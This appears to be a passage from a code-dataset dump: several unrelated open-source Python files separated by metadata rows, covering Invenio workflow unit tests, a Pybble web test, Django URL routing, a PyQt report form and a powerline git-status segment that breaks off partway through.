addr_msg.priority = addr.priority
def _fill_system_proto(self, host, skeleton, embedded=True,
indirect_attrs=True):
self.redirect_proto(host.branch, skeleton.domain)
skeleton.status = host.status.name
self.redirect_proto(host.personality_stage, skeleton.personality)
self.redirect_proto(host.operating_system, skeleton.operating_system)
if host.cluster and not embedded:
skeleton.cluster = host.cluster.name
if host.resholder:
self.redirect_proto(host.resholder.resources, skeleton.resources)
self.redirect_proto(host.services_used, skeleton.services_used,
indirect_attrs=False)
self.redirect_proto([srv.service_instance for srv in host.services_provided],
skeleton.services_provided, indirect_attrs=False)
skeleton.owner_eonid = host.effective_owner_grn.eon_id
for grn_rec in host.grns:
map = skeleton.eonid_maps.add()
map.target = grn_rec.target
map.eonid = grn_rec.eon_id
ObjectFormatter.handlers[NetworkDevice] = NetworkDeviceFormatter()
| apache-2.0 | 1,171,513,508,783,954,400 | 42.577922 | 87 | 0.606318 | false |
smurfix/pybble | test/test_app_run.py | 1 | 1520 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This is part of Pybble, a WMS (Whatever Management System) based on
## Jinja2/Haml, Werkzeug, Flask, and Optimism.
##
## Pybble is Copyright © 2009-2014 by Matthias Urlichs <matthias@urlichs.de>,
## it is licensed under the GPLv3. See the file `README.md` for details,
## including an optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
import pytest
from pybble.manager.main import RootManager
from pybble.core.models.site import Site
from .base import WebTC
from webunit.webunittest import WebTestCase
from .manager import run
def ap_test():
# set a class attribute on the invoking test context
run("mgr -Dt site add AppTest _test atest")
class AppRunTestCase(WebTC,WebTestCase):
# def setupData(self):
# super(AppRunTestCase,self).setupData()
# self.run_manager("mgr -Dt site new AppTest _test atest")
def test_one(self):
self.once(ap_test)
assert Site.q.get_by(name="AppTest").domain == "atest"
self.assertContent("http://atest/one","Number One")
def test_two(self):
self.once(ap_test)
self.assertContent("http://atest/two","Number Two")
def test_three(self):
self.once(ap_test)
self.assertContent("http://atest/three","Number Three")
| gpl-3.0 | 624,786,411,729,272,300 | 31.934783 | 82 | 0.728053 | false |
tiborsimko/invenio-workflows | tests/test_workflows.py | 1 | 31366 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2013, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for workflows."""
from __future__ import absolute_import
import logging
import random
import time
from flask_registry import ImportPathRegistry
from invenio_testing import InvenioTestCase
TEST_PACKAGES = [
'invenio_workflows',
'demo_package',
]
class WorkflowTasksTestCase(InvenioTestCase):
""" Workflow class for testing."""
def create_registries(self):
"""Create registries for testing."""
from invenio_workflows.registry import WorkflowsRegistry
self.app.extensions['registry']['workflows.tests'] = \
ImportPathRegistry(initial=TEST_PACKAGES)
self.app.extensions['registry']['workflows'] = \
WorkflowsRegistry(
'workflows', app=self.app, registry_namespace='workflows.tests'
)
self.app.extensions['registry']['workflows.actions'] = \
WorkflowsRegistry(
'actions', app=self.app, registry_namespace='workflows.tests'
)
def cleanup_registries(self):
"""Clean registries for testing."""
del self.app.extensions['registry']['workflows.tests']
del self.app.extensions['registry']['workflows']
del self.app.extensions['registry']['workflows.actions']
class WorkflowTasksTestAPI(WorkflowTasksTestCase):
""" Test basic workflow API."""
def setUp(self):
"""Setup tests."""
self.create_registries()
self.test_data = {}
self.id_workflows = []
self.recxml = """<?xml version="1.0" encoding="UTF-8"?>
<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">
<responseDate>2013-04-03T13:56:49Z</responseDate>
<request verb="ListRecords" from="2013-03-25" metadataPrefix="arXiv" set="physics:astro-ph">http://export.arxiv.org/oai2</request>
<ListRecords>
<record>
<header>
<identifier>oai:arXiv.org:0801.3931</identifier>
<datestamp>2013-03-26</datestamp>
<setSpec>physics:astro-ph</setSpec>
</header>
<metadata>
<arXiv xmlns="http://arxiv.org/OAI/arXiv/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://arxiv.org/OAI/arXiv/ http://arxiv.org/OAI/arXiv.xsd">
<id>0801.3931</id><created>2008-01-25</created><authors><author><keyname>Manos</keyname><forenames>T.</forenames></author><author><keyname>Athanassoula</keyname><forenames>E.</forenames></author></authors><title>Dynamical study of 2D and 3D barred galaxy models</title><categories>astro-ph</categories><comments>8 pages, 3 figures, to appear in the proceedings of the international
conference "Chaos in Astronomy", Athens, Greece (talk contribution)</comments><journal-ref>Chaos in Astronomy Astrophysics and Space Science Proceedings
2009, pp 115-122</journal-ref><doi>10.1007/978-3-540-75826-6_11</doi><abstract> We study the dynamics of 2D and 3D barred galaxy analytical models, focusing
on the distinction between regular and chaotic orbits with the help of the
Smaller ALigment Index (SALI), a very powerful tool for this kind of problems.
We present briefly the method and we calculate the fraction of chaotic and
regular orbits in several cases. In the 2D model, taking initial conditions on
a Poincar\'{e} $(y,p_y)$ surface of section, we determine the fraction of
regular and chaotic orbits. In the 3D model, choosing initial conditions on a
cartesian grid in a region of the $(x, z, p_y)$ space, which in coordinate
space covers the inner disc, we find how the fraction of regular orbits changes
as a function of the Jacobi constant. Finally, we outline that regions near the
$(x,y)$ plane are populated mainly by regular orbits. The same is true for
regions that lie either near to the galactic center, or at larger relatively
distances from it.
</abstract></arXiv>
</metadata>
</record>
</ListRecords>
</OAI-PMH>
"""
def tearDown(self):
""" Clean up created objects."""
from invenio_workflows.models import Workflow
self.delete_objects(
Workflow.get(Workflow.module_name == "unit_tests").all())
self.cleanup_registries()
def test_halt(self):
"""Test halt task."""
from invenio_workflows.registry import workflows
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.models import (BibWorkflowObjectLog,
ObjectVersion)
def halt_engine(obj, eng):
return eng.halt("Test")
class HaltTest(object):
workflow = [halt_engine]
workflows['halttest'] = HaltTest
data = [set(('somekey', 'somevalue'))]
eng = start('halttest', data, module_name="unit_tests")
idx, obj = list(eng.getObjects())[0]
self.assertEqual(ObjectVersion.WAITING, obj.version)
self.assertEqual(WorkflowStatus.HALTED, eng.status)
self.assertEqual(0, BibWorkflowObjectLog.get(
id_object=obj.id, log_type=logging.ERROR).count())
def test_halt_in_branch(self):
"""Test halt task when in conditionnal branch."""
from workflow.patterns import IF_ELSE
from invenio_workflows.registry import workflows
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.models import (BibWorkflowObjectLog,
ObjectVersion)
def always_true(obj, eng):
return True
def halt_engine(obj, eng):
return eng.halt("Test")
class BranchTest(object):
workflow = [
IF_ELSE(always_true, [halt_engine], [halt_engine])
]
workflows['branchtest'] = BranchTest
data = [set(('somekey', 'somevalue'))]
eng = start('branchtest', data, module_name="unit_tests")
idx, obj = list(eng.getObjects())[0]
self.assertEqual(ObjectVersion.WAITING, obj.version)
self.assertEqual(WorkflowStatus.HALTED, eng.status)
self.assertEqual(0, BibWorkflowObjectLog.get(
id_object=obj.id, log_type=logging.ERROR).count())
def test_object_creation_complete(self):
"""
Test status of object before/after workflow.
When created before calling API, with "high" test-data that will
make the workflow complete.
"""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.api import start
test_object = BibWorkflowObject()
test_object.set_data(20)
test_object.save()
self.assertEqual(ObjectVersion.INITIAL, test_object.version)
self.assertEqual(None, test_object.id_parent)
self.assertEqual(20, test_object.get_data())
engine = start('demo_workflow', [test_object],
module_name="unit_tests")
self.assertEqual(38, test_object.get_data())
self.assertEqual(None, test_object.id_parent)
self.assertEqual(WorkflowStatus.COMPLETED, engine.status)
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
def test_object_creation_halt(self):
"""Test status of object before/after workflow.
When created before calling API, with "low" test-data that will
make the workflow halt.
"""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
test_object = BibWorkflowObject()
test_object.set_data(2)
test_object.save()
self.assertEqual(ObjectVersion.INITIAL, test_object.version)
self.assertEqual(None, test_object.id_parent)
self.assertEqual(2, test_object.get_data())
engine = start('demo_workflow', [test_object],
module_name="unit_tests")
self.assertEqual(2, test_object.get_data())
self.assertEqual(ObjectVersion.WAITING, test_object.version)
self.assertEqual(WorkflowStatus.HALTED, engine.status)
def test_workflow_engine_instantiation(self):
"""Check the proper init of the Workflow and BibWorkflowEngine."""
from invenio_workflows.models import Workflow
from invenio_workflows.engine import BibWorkflowEngine
from uuid import uuid1 as new_uuid
test_workflow = Workflow(name='demo_workflow', uuid=new_uuid(),
id_user=0, module_name="Unknown", )
test_workflow_engine = BibWorkflowEngine(name=test_workflow.name,
uuid=test_workflow.uuid)
self.assertEqual(test_workflow.name, test_workflow_engine.name)
def test_workflow_restarts(self):
"""Check if all is well when restarting a workflow several times."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, continue_oid
from invenio_workflows.engine import WorkflowStatus
test_object = BibWorkflowObject()
random.seed(time.time())
tries = 15
test_object.set_data(tries)
test_object.save()
engine = start('demo_workflow_hardcore', [test_object],
module_name="unit_tests")
for i in range(0, tries):
self.assertEqual(engine.status, WorkflowStatus.HALTED)
for my_object_b in engine.getObjects():
engine = continue_oid(my_object_b[1].id, "restart_task")
self.assertEqual(0, test_object.get_data())
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
self.assertEqual(WorkflowStatus.COMPLETED, engine.status)
def test_workflow_object_creation(self):
"""Test to see if the right snapshots or object versions are created."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
initial_data = 22
final_data = 40
test_object = BibWorkflowObject()
test_object.set_data(initial_data)
test_object.save()
workflow = start(workflow_name="demo_workflow",
data=[test_object],
module_name="unit_tests")
# Get parent object of the workflow we just ran
initial_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id_parent == test_object.id).one()
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
# There should only be 2 objects (initial, final)
self.assertEqual(2, len(all_objects))
self.assertEqual(test_object.id, initial_object.id_parent)
self.assertEqual(ObjectVersion.INITIAL, initial_object.version)
self.assertEqual(initial_data, initial_object.get_data())
self.assertEqual(final_data, test_object.get_data())
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
def test_workflow_object_creation_simple(self):
"""Test to see if the right snapshots or object versions are created."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
initial_data = 22
final_data = 40
workflow = start(workflow_name="demo_workflow",
data=[initial_data],
module_name="unit_tests")
# Get parent object of the workflow we just ran
initial_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == None).first() # noqa E711
test_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == initial_object.id).first()
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
# There should only be 2 objects (initial, final)
self.assertEqual(2, len(all_objects))
self.assertEqual(test_object.id_parent, initial_object.id)
self.assertEqual(ObjectVersion.COMPLETED, initial_object.version)
self.assertEqual(final_data, initial_object.get_data())
self.assertEqual(initial_data, test_object.get_data())
self.assertEqual(ObjectVersion.INITIAL, test_object.version)
def test_workflow_complex_run(self):
"""Test running workflow with several data objects."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
self.test_data = [1, 20]
final_data = [1, 38]
workflow = start(workflow_name="demo_workflow",
data=self.test_data,
module_name="unit_tests")
# Get parent objects of the workflow we just ran
objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == None # noqa E711
).order_by(BibWorkflowObject.id).all()
# Let's check that we found anything.
# There should only be three objects
self.assertEqual(2, len(objects))
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
self.assertEqual(4, len(all_objects))
for obj in objects:
# The child object should have the final or halted version
self.assertTrue(obj.child_objects[0].version in (ObjectVersion.INITIAL,
ObjectVersion.HALTED))
# Making sure the final data is correct
self.assertTrue(obj.get_data() in final_data)
self.assertTrue(obj.child_objects[0].get_data() in self.test_data)
def test_workflow_approve_step(self):
"""Test runnning a record ingestion workflow with a action step."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.api import start
initial_data = 1
workflow = start(workflow_name="demo_workflow_approve",
data=[initial_data],
module_name="unit_tests")
# Get objects of the workflow we just ran
objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == None # noqa E711
).order_by(BibWorkflowObject.id).all()
self._check_workflow_execution(objects, initial_data)
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
self.assertEqual(2, len(all_objects))
self.assertEqual(WorkflowStatus.HALTED, workflow.status)
current = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.version == ObjectVersion.HALTED
).one()
self.assertEqual(current.get_action(), "approval")
def test_workflow_for_halted_object(self):
"""Test workflow with continuing a halted object."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, continue_oid
from invenio_workflows.engine import WorkflowStatus
current = BibWorkflowObject()
current.set_data(1)
current.save()
workflow = start(workflow_name="demo_workflow_approve",
data=[current],
module_name="unit_tests")
self.assertEqual(WorkflowStatus.HALTED, workflow.status)
self.assertEqual(ObjectVersion.HALTED, current.version)
workflow = continue_oid(current.id,
module_name="unit_tests")
self.assertEqual(WorkflowStatus.COMPLETED, workflow.status)
self.assertEqual(ObjectVersion.COMPLETED, current.version)
def test_workflow_for_finished_object(self):
"""Test starting workflow with finished object given."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
current = BibWorkflowObject()
current.set_data(20)
current.save()
workflow = start(workflow_name="demo_workflow",
data=[current],
module_name="unit_tests")
self.assertEqual(WorkflowStatus.COMPLETED, workflow.status)
self.assertEqual(ObjectVersion.COMPLETED, current.version)
self.assertEqual(38, current.get_data())
previous = BibWorkflowObject.query.get(current.id)
workflow_2 = start(workflow_name="demo_workflow",
data=[previous],
module_name="unit_tests")
self.assertEqual(WorkflowStatus.COMPLETED, workflow_2.status)
self.assertEqual(ObjectVersion.COMPLETED, previous.version)
self.assertEqual(56, previous.get_data())
def test_logging_for_workflow_objects_without_workflow(self):
"""Test run a virtual object out of a workflow for test purpose."""
from invenio_workflows.models import (BibWorkflowObject,
BibWorkflowObjectLog,
ObjectVersion)
initial_data = 20
obj_init = BibWorkflowObject(
id_workflow=None,
version=ObjectVersion.INITIAL)
obj_init.set_data(initial_data)
obj_init.save()
err_msg = "This is an error message"
info_msg = "This is an info message"
obj_init.log.info(info_msg)
obj_init.log.error("This is an error message")
# FIXME: loglevels are simply overwritten somewhere in Celery
# even if Celery is not being "used".
#
# This means loglevel.DEBUG is NOT working at the moment!
# debug_msg = "This is a debug message"
# obj_init.log.debug(debug_msg)
obj_init.save()
obj_test = BibWorkflowObjectLog.query.filter(
BibWorkflowObjectLog.id_object == obj_init.id).all()
messages_found = 0
for current_obj in obj_test:
if current_obj.message == info_msg and messages_found == 0:
messages_found += 1
elif current_obj.message == err_msg and messages_found == 1:
messages_found += 1
self.assertEqual(2, messages_found)
def test_workflow_for_running_object(self):
"""Test workflow with running object given and watch it fail."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start_by_oids
from invenio_workflows.errors import WorkflowObjectVersionError
obj_running = BibWorkflowObject()
obj_running.set_data(1234)
obj_running.save(version=ObjectVersion.RUNNING)
try:
start_by_oids(
'demo_workflow', [
obj_running.id], module_name="unit_tests")
except Exception as e:
self.assertTrue(isinstance(e, WorkflowObjectVersionError))
obj_running.delete(e.id_object)
obj_running.delete(obj_running)
obj_running = BibWorkflowObject()
obj_running.set_data(1234)
obj_running.save(version=ObjectVersion.RUNNING)
try:
start_by_oids(
'demo_workflow', [
obj_running.id], module_name="unit_tests")
except Exception as e:
self.assertTrue(isinstance(e, WorkflowObjectVersionError))
obj_running.delete(e.id_object)
obj_running.delete(obj_running)
obj_running = BibWorkflowObject()
obj_running.set_data(1234)
obj_running.save(version=5)
try:
start_by_oids('demo_workflow', [obj_running.id],
module_name="unit_tests")
except Exception as e:
self.assertTrue(isinstance(e, WorkflowObjectVersionError))
obj_running.delete(e.id_object)
obj_running.delete(obj_running)
def test_continue_execution_for_object(self):
"""Test continuing execution of workflow for object given."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, continue_oid
initial_data = 1
# testing restarting from previous task
init_workflow = start("demo_workflow",
data=[initial_data],
module_name="unit_tests")
obj_halted = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == init_workflow.uuid,
BibWorkflowObject.version == ObjectVersion.WAITING
).first()
self.assertTrue(obj_halted)
self.assertEqual(1, obj_halted.get_data())
# Try to restart, we should halt again actually.
continue_oid(oid=obj_halted.id, start_point="restart_task",
module_name="unit_tests")
self.assertEqual(1, obj_halted.get_data())
self.assertEqual(ObjectVersion.WAITING, obj_halted.version)
# We skip to next part, this should work
continue_oid(oid=obj_halted.id, module_name="unit_tests")
self.assertEqual(19, obj_halted.get_data())
self.assertEqual(ObjectVersion.COMPLETED, obj_halted.version)
# Let's do that last task again, shall we?
continue_oid(oid=obj_halted.id, start_point="restart_prev",
module_name="unit_tests")
self.assertEqual(37, obj_halted.get_data())
self.assertEqual(ObjectVersion.COMPLETED, obj_halted.version)
def test_restart_workflow(self):
"""Test restarting workflow for given workflow id."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, start_by_wid
initial_data = 1
init_workflow = start(workflow_name="demo_workflow",
data=[initial_data],
module_name="unit_tests")
init_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == init_workflow.uuid
).order_by(BibWorkflowObject.id).all()
self.assertEqual(2, len(init_objects))
restarted_workflow = start_by_wid(wid=init_workflow.uuid,
module_name="unit_tests")
# We expect the same workflow to be re-started
self.assertTrue(init_workflow.uuid == restarted_workflow.uuid)
restarted_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == restarted_workflow.uuid
).order_by(BibWorkflowObject.id).all()
# This time we should only have one more initial object
self.assertEqual(2, len(restarted_objects))
# Last object will be INITIAL
self.assertEqual(ObjectVersion.INITIAL, restarted_objects[1].version)
self.assertEqual(restarted_objects[1].id_parent,
restarted_objects[0].id)
def test_restart_failed_workflow(self):
"""Test restarting workflow for given workflow id."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.api import start, start_by_oids
from invenio_workflows.errors import WorkflowError
initial_data = BibWorkflowObject.create_object()
initial_data.set_data(1)
initial_data.save()
self.assertRaises(
WorkflowError,
start,
workflow_name="demo_workflow_error",
data=[initial_data],
module_name="unit_tests"
)
self.assertEqual(initial_data.version, ObjectVersion.ERROR)
restarted_workflow = start_by_oids("demo_workflow",
oids=[initial_data.id],
module_name="unit_tests")
self.assertEqual(initial_data.version, ObjectVersion.WAITING)
self.assertEqual(restarted_workflow.status, WorkflowStatus.HALTED)
def _check_workflow_execution(self, objects, initial_data):
"""Test correct workflow execution."""
from invenio_workflows.models import ObjectVersion
# Let's check that we found anything. There should only be one object
self.assertEqual(len(objects), 1)
parent_object = objects[0]
# The object should be the inital version
self.assertEqual(ObjectVersion.HALTED, parent_object.version)
# The object should have the inital data
self.assertEqual(initial_data, objects[0].child_objects[0].get_data())
# Fetch final object which should exist
final_object = objects[0].child_objects[0]
self.assertTrue(final_object)
class TestWorkflowTasks(WorkflowTasksTestCase):
"""Test meant for testing the the generic tasks available."""
def setUp(self):
"""Setup tests."""
self.create_registries()
def tearDown(self):
"""Clean up tests."""
from invenio_workflows.models import Workflow
self.delete_objects(
Workflow.get(Workflow.module_name == "unit_tests").all())
self.cleanup_registries()
def test_logic_tasks_restart(self):
"""Test that the logic tasks work correctly when restarted."""
from invenio_workflows.models import BibWorkflowObject
from invenio_workflows.api import (start,
start_by_wid)
test_object = BibWorkflowObject()
test_object.set_data(0)
test_object.save()
# Initial run
workflow = start('demo_workflow_logic', [test_object],
module_name="unit_tests")
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
# Reset before re-starting (reset Iterator data)
workflow.reset_extra_data()
workflow = start_by_wid(workflow.uuid)
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
def test_logic_tasks_continue(self):
"""Test that the logic tasks work correctly when continuing."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import (start,
continue_oid)
from invenio_workflows.engine import WorkflowStatus
test_object = BibWorkflowObject()
test_object.set_data(0)
test_object.save()
workflow = start('demo_workflow_logic', [test_object],
module_name="unit_tests")
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(6, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(9, test_object.get_data())
self.assertEqual("gte9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(15, test_object.get_data())
self.assertEqual("gte9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
self.assertEqual(WorkflowStatus.COMPLETED, workflow.status)
def test_workflow_without_workflow_object_saved(self):
"""Test that the logic tasks work correctly."""
from invenio_workflows.models import BibWorkflowObject
from invenio_workflows.api import start, start_by_wid
test_object = BibWorkflowObject()
test_object.set_data(0)
test_object.save()
workflow = start(
'demo_workflow_logic',
[test_object],
module_name="unit_tests")
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
start_by_wid(workflow.uuid)
test_object.delete(test_object.id)
def test_workflow_task_results(self):
"""Test the setting and getting of task results."""
from invenio_workflows.models import BibWorkflowObject
test_object = BibWorkflowObject()
test_object.save() # Saving is needed to instantiate default values
test_object.add_task_result("test", {"data": "testing"})
results = test_object.get_tasks_results()
self.assertEqual(len(results.get("test")), 1)
result_item = results.get("test")[0]
self.assertEqual({"data": "testing"},
result_item.get("result"))
self.assertEqual("workflows/results/default.html",
result_item.get("template"))
self.assertEqual("test",
result_item.get("name"))
| gpl-2.0 | 8,674,019,974,697,286,000 | 40.325428 | 381 | 0.62826 | false |
IQSS/gentb-site | apps/predict/urls.py | 2 | 2054 | #
# Copyright (C) 2017 Maha Farhat
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# pylint: disable=invalid-name
"""
Predict app's urls
"""
from django.urls import path
from django.conf.urls import include, url
from .views import (
Datasets, UploadChoices, UploadView, DatasetView, AddNote, ScatterPlot,
DatasetViewProcessing, DatasetViewOutput, DatasetViewPredict, DatasetViewLineages
)
def url_tree(regex, *urls):
class UrlTwig(object):
urlpatterns = urls
return url(regex, include(UrlTwig))
app_name = 'predict'
urlpatterns = [
path('', Datasets.as_view(), name="view_my_datasets"),
url_tree(
r'^upload/',
url(r'^$', UploadChoices.as_view(), name="upload"),
url(r'^(?P<type>[\w-]+)/$', UploadView.as_view(), name="upload"),
),
url_tree(
r'^(?P<slug>\w{32})/',
url(r'^$', DatasetView.as_view(), name="view_single_dataset"),
url_tree(
r'^page/',
url(r'^process/$', DatasetViewProcessing.as_view(), name="dataset_proc"),
url(r'^output/$', DatasetViewOutput.as_view(), name="dataset_out"),
url(r'^predict/$', DatasetViewPredict.as_view(), name="dataset_pred"),
url(r'^lineages/$', DatasetViewLineages.as_view(), name="dataset_lin"),
),
url(r'^note/$', AddNote.as_view(), name="add_note"),
),
url(r'^results/(?P<pk>\d+)/plot/', ScatterPlot.as_view(), name="scatter_plot"),
]
| agpl-3.0 | -3,061,693,881,197,445,600 | 35.678571 | 85 | 0.655794 | false |
InUrSys/PescArt2.0 | src/Reports/Relatorio_SaidasPorProvinica.py | 1 | 1633 | '''
Created on 01/02/2018
@author: chernomirdinmacuvele
'''
import ReportAPI
from ui_Relatorio_SaidasPorProvincia import Ui_Form
import FuncSQL
from PyQt5.Qt import QPlainTextEdit, QComboBox
class Relatorio_SaidasPorProvincia(ReportAPI.JasperReports, Ui_Form):
def __init__(self, parent=None, dbcon=None):
super(Relatorio_SaidasPorProvincia, self).__init__(parent)
self.setupUi(self)
self.dbcon = dbcon
self.relatorio = 'Saidas_Distrito'
self.setForm()
def setForm(self):
self.LEFormato.setText(self.getFormat())
self.getInfoReport()
self.setProvincias()
self.PBGerar.clicked.connect(self.generateReport)
def getInfoReport(self):
quer = "SELECT nome, descricao FROM public.prc_relatorios where nome = '{nome}'".format(nome = self.relatorio)
bok, valOut = FuncSQL.anySelectScript(scpt= quer)
if bok:
self.LENome.setText(str(valOut[0]))
self.PTEDescricao.setPlainText(str(valOut[1]))
def setProvincias(self):
quer = "select distinct provincia from view_saidas_provincias"
lstOut = []
bok, valOut = FuncSQL.multLineSelect(scpt=quer)
if bok:
for val in valOut:
lstOut.append(val[0])
self.CBProvincia.addItems(lstOut)
def generateReport(self):
file = self.LENome.text()
formato = self.LEFormato.text().lower()
provincia = [self.CBProvincia.currentText()]
self.getTemplateFile(file=file, format=formato, parametro=provincia) | gpl-3.0 | 6,905,557,344,856,947,000 | 31.68 | 118 | 0.63319 | false |
adamk33n3r/powerline-gitstatus | powerline_gitstatus/segments.py | 1 | 6654 | # vim:fileencoding=utf-8:noet
from powerline.segments import Segment, with_docstring
from powerline.theme import requires_segment_info
from subprocess import PIPE, Popen
import os, re, string
@requires_segment_info
class GitStatusSegment(Segment):
def execute(self, pl, command):
pl.debug('Executing command: %s' % ' '.join(command))
proc = Popen(command, stdout=PIPE, stderr=PIPE)
out, err = [item.decode('utf-8') for item in proc.communicate()]
if out:
pl.debug('Command output: %s' % out.strip(string.whitespace))
if err:
pl.debug('Command errors: %s' % err.strip(string.whitespace))
return (out.splitlines(), err.splitlines())
def get_base_command(self, cwd, use_dash_c):
if use_dash_c:
return ['git', '-C', cwd]
while cwd and cwd != os.sep:
gitdir = os.path.join(cwd, '.git')
if os.path.isdir(gitdir):
return ['git', '--git-dir=%s' % gitdir, '--work-tree=%s' % cwd]
cwd = os.path.dirname(cwd)
return None
def parse_branch(self, line):
if not line:
return ('', False, 0, 0)
if line.startswith('## '):
line = line[3:]
match = re.search('^Initial commit on (.+)$', line)
if match is not None:
return (match.group(1), False, 0, 0)
match = re.search('^(.+) \(no branch\)$', line)
if match is not None:
return (match.group(1), True, 0, 0)
match = re.search('^(.+?)\.\.\.', line)
if match is not None:
branch = match.group(1)
match = re.search('\[ahead (\d+), behind (\d+)\]$', line)
if match is not None:
return (branch, False, int(match.group(2)), int(match.group(1)))
match = re.search('\[ahead (\d+)\]$', line)
if match is not None:
return (branch, False, 0, int(match.group(1)))
match = re.search('\[behind (\d+)\]$', line)
if match is not None:
return (branch, False, int(match.group(1)), 0)
return (branch, False, 0, 0)
return (line, False, 0, 0)
def parse_status(self, lines):
staged = len([True for l in lines if l[0] in 'MRC' or (l[0] == 'D' and l[1] != 'D') or (l[0] == 'A' and l[1] != 'A')])
unmerged = len([True for l in lines if l[0] == 'U' or l[1] == 'U' or (l[0] == 'A' and l[1] == 'A') or (l[0] == 'D' and l[1] == 'D')])
changed = len([True for l in lines if l[1] == 'M' or (l[1] == 'D' and l[0] != 'D')])
untracked = len([True for l in lines if l[0] == '?'])
return (staged, unmerged, changed, untracked)
def build_segments(self, branch, detached, behind, ahead, staged, unmerged, changed, untracked, stashed):
if detached:
branch_group = 'gitstatus_branch_detached'
elif staged or unmerged or changed or untracked:
branch_group = 'gitstatus_branch_dirty'
else:
branch_group = 'gitstatus_branch_clean'
segments = [
{'contents': u'\ue0a0 %s' % branch, 'highlight_groups': [branch_group, 'gitstatus_branch', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'}
]
if behind:
